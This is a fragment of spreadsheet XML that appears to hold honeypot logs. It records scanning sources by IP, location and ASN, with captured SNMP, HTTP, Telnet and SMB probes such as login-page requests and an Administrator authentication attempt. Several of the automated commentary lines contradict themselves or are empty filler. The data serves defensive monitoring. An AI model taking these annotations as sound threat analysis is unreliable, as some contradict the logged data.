    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H9</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;62915&amp;&amp;58115&amp;&amp;65214&amp;&amp;63081&amp;&amp;55123&amp;&amp;50308&amp;&amp;53540&amp;&amp;62969&amp;&amp;59921&amp;&amp;65260&amp;&amp;62798&amp;&amp;56089&amp;&amp;62204&amp;&amp;65369&amp;&amp;59058&amp;&amp;61234&amp;&amp;57987&amp;&amp;63474&amp;&amp;54103&amp;&amp;58198</t>
  </si>
  <si>
    <t>::ffff:ac51:3eee</t>
  </si>
  <si>
    <t>This suggests an attempt to access VNC service, possibly for unauthorized remote access. 
No login credentials were provided (Data_VNC:NA). 
This may indicate a scanning or probing activity rather than a successful connection.</t>
  </si>
  <si>
    <t>206a7450f7a3add27a67babbc585a721</t>
  </si>
  <si>
    <t>172.81.62.167</t>
  </si>
  <si>
    <t>unassigned.172-81-62-167.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1549&amp;&amp;5900&amp;&amp;62681&amp;&amp;59175&amp;&amp;52540&amp;&amp;62503&amp;&amp;61496&amp;&amp;51095&amp;&amp;53108&amp;&amp;62660&amp;&amp;58751&amp;&amp;52121&amp;&amp;63413&amp;&amp;58347&amp;&amp;49847&amp;&amp;51993&amp;&amp;52307&amp;&amp;52313&amp;&amp;53503&amp;&amp;60167&amp;&amp;60132&amp;&amp;61690&amp;&amp;65031&amp;&amp;64326&amp;&amp;56893&amp;&amp;54523</t>
  </si>
  <si>
    <t>::ffff:ac51:3ea7</t>
  </si>
  <si>
    <t>No logs available for analysis, unable to determine possible malicious activity.</t>
  </si>
  <si>
    <t>16472b86ec3c183ddd45031b2d7a7165</t>
  </si>
  <si>
    <t>103.173.211.78</t>
  </si>
  <si>
    <t>Jind</t>
  </si>
  <si>
    <t>Jīnd (Dyal Bagh Colony)</t>
  </si>
  <si>
    <t>1268907</t>
  </si>
  <si>
    <t>126102</t>
  </si>
  <si>
    <t>29.3192</t>
  </si>
  <si>
    <t>76.311</t>
  </si>
  <si>
    <t>132771</t>
  </si>
  <si>
    <t>FIBREAIR-AS</t>
  </si>
  <si>
    <t>Speednet Julana</t>
  </si>
  <si>
    <t>::ffff:67ad:d34e</t>
  </si>
  <si>
    <t>No TELNET activity detected, which might indicate that an attacker tried to scan or exploit this service but was unsuccessful or uninterested. 
TELNET services are often targeted by attackers for potential brute-force login attempts.
This could be a sign of a reconnaissance phase where the attacker identifies available services on the system. &amp;&amp; The data indicates that there was an attempt to access the TELNET service, but it was unsuccessful or not available, as indicated by NA (not applicable) status. This could be a scanning activity or a failed login attempt. No malicious activity is confirmed as the service was either unavailable or inaccessible.</t>
  </si>
  <si>
    <t>14701cd76a772722178892704bc8757f</t>
  </si>
  <si>
    <t>117.209.43.236</t>
  </si>
  <si>
    <t>::ffff:75d1:2bec</t>
  </si>
  <si>
    <t>71399f126aeb607c17a278197e1164a2</t>
  </si>
  <si>
    <t>117.208.229.204</t>
  </si>
  <si>
    <t>::ffff:75d0:e5cc</t>
  </si>
  <si>
    <t>No TELNET activity detected. 
TELNET is typically used for remote access, but its absence here could indicate a malicious attempt to exploit the service. This lack of activity may be due to either an attacker bypassing or not targeting this particular service.</t>
  </si>
  <si>
    <t>Scan Attempt</t>
  </si>
  <si>
    <t>2c7ce6269e1e43da51d795d1678ba54a</t>
  </si>
  <si>
    <t>152.32.214.133</t>
  </si>
  <si>
    <t>UCLOUD-HK-AS-AP</t>
  </si>
  <si>
    <t>Ucloud Information Technology (Hk) Limited</t>
  </si>
  <si>
    <t>login</t>
  </si>
  <si>
    <t>::ffff:9820:d685</t>
  </si>
  <si>
    <t>a044518b23a50ebde258933bc72ff661</t>
  </si>
  <si>
    <t>104.234.115.74</t>
  </si>
  <si>
    <t>NA&amp;&amp;crawler74.deepfield.net&amp;&amp;crawler074.deepfield.net</t>
  </si>
  <si>
    <t>SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_MT-CPA_H33</t>
  </si>
  <si>
    <t>161&amp;&amp;110&amp;&amp;123&amp;&amp;80&amp;&amp;9100&amp;&amp;3306&amp;&amp;25&amp;&amp;443&amp;&amp;21846&amp;&amp;6379&amp;&amp;23&amp;&amp;6667&amp;&amp;143&amp;&amp;21&amp;&amp;1433&amp;&amp;21926&amp;&amp;21915&amp;&amp;NA&amp;&amp;21585&amp;&amp;21734</t>
  </si>
  <si>
    <t>NA&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': '                    CAPA'}}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': '38.54.79.122:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'cmd': 'User-Agent:'}}&amp;&amp;{Data_POP3:{'args': '*/*', 'cmd': 'Accept:'}}&amp;&amp;{Data_POP3:{'args': 'gzip', 'cmd': 'Accept-Encoding:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '185.255.123.181:110', 'cmd': 'Host:'}}&amp;&amp;{Data_POP3:{'args': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'cmd': 'User-Agent:'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/manage/account/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/manage/account/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/admin/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/+CSCOE+/logon.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}</t>
  </si>
  <si>
    <t>::ffff:68ea:734a</t>
  </si>
  <si>
    <t>4b72ceb3bdbe6d8f776fbfbb3830ade5</t>
  </si>
  <si>
    <t>43.249.52.74</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;33285&amp;&amp;3306&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>77.209</t>
  </si>
  <si>
    <t>133275</t>
  </si>
  <si>
    <t>Gigantic Infotel Pvt Ltd</t>
  </si>
  <si>
    <t>Gigantic Network Solution</t>
  </si>
  <si>
    <t>2014-10-07</t>
  </si>
  <si>
    <t>GTEL-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,62400)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,55704)}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.74,56385)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:2bf9:344a</t>
  </si>
  <si>
    <t>3e587acd33230783b9ab2a0133d542d8</t>
  </si>
  <si>
    <t>200.39.40.19</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;57792&amp;&amp;NA</t>
  </si>
  <si>
    <t>3448439</t>
  </si>
  <si>
    <t>01000-000</t>
  </si>
  <si>
    <t>-23.5558</t>
  </si>
  <si>
    <t>-46.6396</t>
  </si>
  <si>
    <t>271402</t>
  </si>
  <si>
    <t>Live Conect Telecomunicações Ltda.</t>
  </si>
  <si>
    <t>Live Conect Telecomunicações Ltda</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56311)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56822)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,63083)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,63860)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,54174)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,54349)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51296)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51464)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,51931)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,52044)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56320)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56595)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,64783)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65034)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,56653)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,57229)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,57491)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65178)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,65350)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,62704)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,62800)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.39.40.19,49932)}</t>
  </si>
  <si>
    <t>::ffff:c827:2813</t>
  </si>
  <si>
    <t>The attacker is scanning the network for vulnerable services, attempting to exploit them for further malicious activities such as data theft, unauthorized access, and potentially even deploying malware.</t>
  </si>
  <si>
    <t>NCRACK Attempt</t>
  </si>
  <si>
    <t>de645797038f66d9923c06d08e1d06a4</t>
  </si>
  <si>
    <t>45.226.5.13</t>
  </si>
  <si>
    <t>::ffff:2de2:50d</t>
  </si>
  <si>
    <t>eb9a38ad6a696a4251d44aa4846cc07a</t>
  </si>
  <si>
    <t>180.255.100.58</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H32</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;NA&amp;&amp;52594</t>
  </si>
  <si>
    <t>Singapore (Queenstown Estate)</t>
  </si>
  <si>
    <t>1.29229</t>
  </si>
  <si>
    <t>103.808</t>
  </si>
  <si>
    <t>9506</t>
  </si>
  <si>
    <t>Singapore Telecommunications Ltd, Magix Services</t>
  </si>
  <si>
    <t>Singtel Fibre</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,58186)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,58528)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57433)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57657)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,57403)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,53961)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,54364)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52891)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,53065)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,50645)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,50839)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52640)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,52702)}&amp;&amp;{Data_SMB:Incoming connection (180.255.100.58,59062)}</t>
  </si>
  <si>
    <t>::ffff:b4ff:643a</t>
  </si>
  <si>
    <t>No available log data provided. 
However, if you provide some log data I can analyze it for possible malicious activity as per your request.</t>
  </si>
  <si>
    <t>d81962637549e44efb332622d91db936</t>
  </si>
  <si>
    <t>79.8.56.234</t>
  </si>
  <si>
    <t>host-79-8-56-234.business.telecomitalia.it&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>Piedmont</t>
  </si>
  <si>
    <t>Province of Alessandria</t>
  </si>
  <si>
    <t>Alessandria</t>
  </si>
  <si>
    <t>3183299</t>
  </si>
  <si>
    <t>15100</t>
  </si>
  <si>
    <t>44.9073</t>
  </si>
  <si>
    <t>8.61168</t>
  </si>
  <si>
    <t>3269</t>
  </si>
  <si>
    <t>Telecom Italia S.p.A.</t>
  </si>
  <si>
    <t>INTERBUSINESS</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:4f08:38ea</t>
  </si>
  <si>
    <t>d2eddc4295453bf8a25f5398184c4b6d</t>
  </si>
  <si>
    <t>59.98.24.113</t>
  </si>
  <si>
    <t>BSNL GSM EastZone</t>
  </si>
  <si>
    <t>BSNL-GSM-EastZone</t>
  </si>
  <si>
    <t>::ffff:3b62:1871</t>
  </si>
  <si>
    <t>0b243e7ef8fe7d7d42c09ed1015f1f3b</t>
  </si>
  <si>
    <t>117.222.239.21</t>
  </si>
  <si>
    <t>::ffff:75de:ef15</t>
  </si>
  <si>
    <t>No connection attempt made over telnet, or activity was not detected through this service. 
Activity appears to be benign with no notable malicious attempts observed.
Service is inactive for the specified timeframe. &amp;&amp; This log indicates that there was an attempted connection to a telnet service, but no further information is available about the attempt. The lack of activity may suggest a failed or blocked attack. No actual malicious activity occurred.</t>
  </si>
  <si>
    <t>Telnet Attack &amp;&amp; Telnet Attack</t>
  </si>
  <si>
    <t>22ecdf8fb3b75492a2cea34916eb0321</t>
  </si>
  <si>
    <t>152.200.195.92</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33</t>
  </si>
  <si>
    <t>Bogotá (Suba)</t>
  </si>
  <si>
    <t>111111</t>
  </si>
  <si>
    <t>4.69732</t>
  </si>
  <si>
    <t>-74.0697</t>
  </si>
  <si>
    <t>3816</t>
  </si>
  <si>
    <t>COLOMBIA TELECOMUNICACIONES S.A. ESP</t>
  </si>
  <si>
    <t>Colombia Telecomunicaciones S.a. ESP</t>
  </si>
  <si>
    <t>Colombia Telecomunicaciones S.a. ESP BIC</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (152.200.195.92,39455)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (Administrator,)}&amp;&amp;{Data_SMB:Incoming connection (152.200.195.92,40471)}</t>
  </si>
  <si>
    <t>::ffff:98c8:c35c</t>
  </si>
  <si>
    <t>An authentication attempt was made using the Administrator account for a Windows service.
This could be an attempted brute-force login or unauthorized access to sensitive areas of the system.
